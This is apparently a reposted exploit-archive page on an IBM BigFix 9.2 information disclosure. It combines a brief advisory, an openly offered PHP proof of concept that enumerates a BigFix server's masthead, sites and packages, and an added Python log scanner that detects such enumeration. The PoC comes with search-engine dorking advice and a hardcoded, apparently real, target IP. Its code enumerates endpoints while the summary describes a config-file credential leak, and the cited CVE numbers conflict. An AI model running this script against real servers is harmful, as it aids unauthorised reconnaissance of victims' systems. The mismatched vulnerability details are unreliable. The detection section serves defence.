IBM BigFix Platform 9.2 Information Disclosure
IBM BigFix Platform 9.2 was affected by an information disclosure vulnerability. This flaw primarily impacted the Web Reports component, allowing unauthorized access to sensitive configuration files.

Specifically, files like `datasourcename.properties` were exposed. These files contained critical information such as database credentials and administrative passwords.

Such exposure could lead to unauthorized database access, privilege escalation, and further system compromise. The vulnerability is tracked as CVE-2015-1941.

IBM addressed this issue with a security patch. Users were advised to upgrade to patched versions or apply the provided fixes to mitigate the risk.

=============================================================================================================================================
| # Title : IBM BigFix Platform 9.2 gather information Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://bigfix.com/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] Code Description: The code explores the IBM BigFix server via HTTP queries using cURL.

(linked: https://packetstorm.news/files/id/180698/ Linked CVE numbers: CVE-2019-4061),

[+] save code as poc.php.

[+] Set Target : line 68

[+] Usage : php poc.php

[+] PayLoad :

<?php

class IBM_BigFix_Enum
{
    private $targetUri;
    private $port;
    private $ssl;

    public function __construct($targetUri, $port = 52311, $ssl = true)
    {
        $this->targetUri = rtrim($targetUri, '/');
        $this->port = $port;
        $this->ssl = $ssl;
    }

    // Issue a GET request for $uri on the configured host and port; returns the body or false.
    private function sendRequest($uri)
    {
        $url = ($this->ssl ? 'https://' : 'http://') . $this->targetUri . ":$this->port" . '/' . ltrim($uri, '/');
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    // Read the masthead and print its Organization and URL fields.
    public function getMasthead()
    {
        $response = $this->sendRequest('masthead/masthead.axfm');
        if ($response && preg_match('/Organization: (.*)./', $response, $matches)) {
            echo "Organization: " . htmlspecialchars($matches[1]) . "\n";
        }
        if ($response && preg_match_all('/URL: (.*)./', $response, $matches)) {
            foreach ($matches[1] as $url) {
                echo "URL: " . htmlspecialchars($url) . "\n";
            }
        }
    }

    // Print the site entries returned by the FetchCommands request.
    public function getSites()
    {
        $response = $this->sendRequest('cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands');
        if ($response && preg_match_all('/: ([^ ]+)/', $response, $matches)) {
            echo "Sites:\n";
            foreach ($matches[1] as $site) {
                echo "- " . htmlspecialchars($site) . "\n";
            }
        }
    }

    // Print the package URLs listed in the BESMirrorRequest response.
    public function getPackages()
    {
        $response = $this->sendRequest('cgi-bin/bfenterprise/BESMirrorRequest.exe');
        if (!$response) {
            return;
        }

        echo "Packages:\n";
        if (preg_match_all('/url: (.*)/', $response, $matches)) {
            foreach ($matches[1] as $url) {
                echo "- " . htmlspecialchars($url) . "\n";
            }
        }
    }
}

// Usage: set the target host below
$bigFix = new IBM_BigFix_Enum('153.143.185.78');
$bigFix->getMasthead();
$bigFix->getSites();


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
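
Defender-side view of the same three requests, as an added example that is not part of the original advisory or of any IBM tooling: it scans access logs for sources outside the managed client ranges that receive answers from two or more of the endpoints the PoC queries. The common-log-format input (from a proxy or sensor in front of port 52311), the `MANAGED_NETS` range, the premise that legitimate agents and relays also call these endpoints, and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Paths requested by the PoC above (compared lower-cased, query string removed).
ENUM_PATHS = {
    "/masthead/masthead.axfm": "masthead",
    "/cgi-bin/bfenterprise/clientregister.exe": "sites",
    "/cgi-bin/bfenterprise/besmirrorrequest.exe": "packages",
}
# Assumption: subnets where real BigFix clients and relays live.
MANAGED_NETS = [ip_network("10.20.0.0/16")]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Constructed sample lines in common log format (not real traffic).
SAMPLE_LOG = """\
10.20.4.17 - - [12/Mar/2025:09:14:02 +0000] "GET /cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands HTTP/1.1" 200 512
198.51.100.23 - - [12/Mar/2025:09:15:40 +0000] "GET /masthead/masthead.axfm HTTP/1.1" 200 2048
198.51.100.23 - - [12/Mar/2025:09:15:41 +0000] "GET /cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands HTTP/1.1" 200 733
198.51.100.23 - - [12/Mar/2025:09:15:42 +0000] "GET /cgi-bin/bfenterprise/BESMirrorRequest.exe HTTP/1.1" 200 9120
203.0.113.9 - - [12/Mar/2025:09:20:00 +0000] "GET /masthead/masthead.axfm HTTP/1.1" 404 0
not a log line
"""

def find_enumeration(log_text, managed=MANAGED_NETS, min_endpoints=2):
    """Return {source_ip: sorted endpoint labels} for unmanaged sources that
    got 2xx answers from at least `min_endpoints` distinct BigFix endpoints."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of failing the run
        src, _ts, target, status = m.groups()
        label = ENUM_PATHS.get(target.split("?", 1)[0].lower())
        if label is None or not status.startswith("2"):
            continue  # other path, or the server did not answer with data
        try:
            addr = ip_address(src)
        except ValueError:
            continue  # hostname or garbage in the client field
        if any(addr in net for net in managed):
            continue  # expected agent/relay traffic
        hits[src].add(label)
    return {ip: sorted(v) for ip, v in hits.items() if len(v) >= min_endpoints}

if __name__ == "__main__":
    for ip, labels in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip} enumerated: {', '.join(labels)}")
```

Any source reported here reached the server on port 52311 from outside the agent ranges, which is itself a finding: the exposure ends when that port is filtered to managed networks.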
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.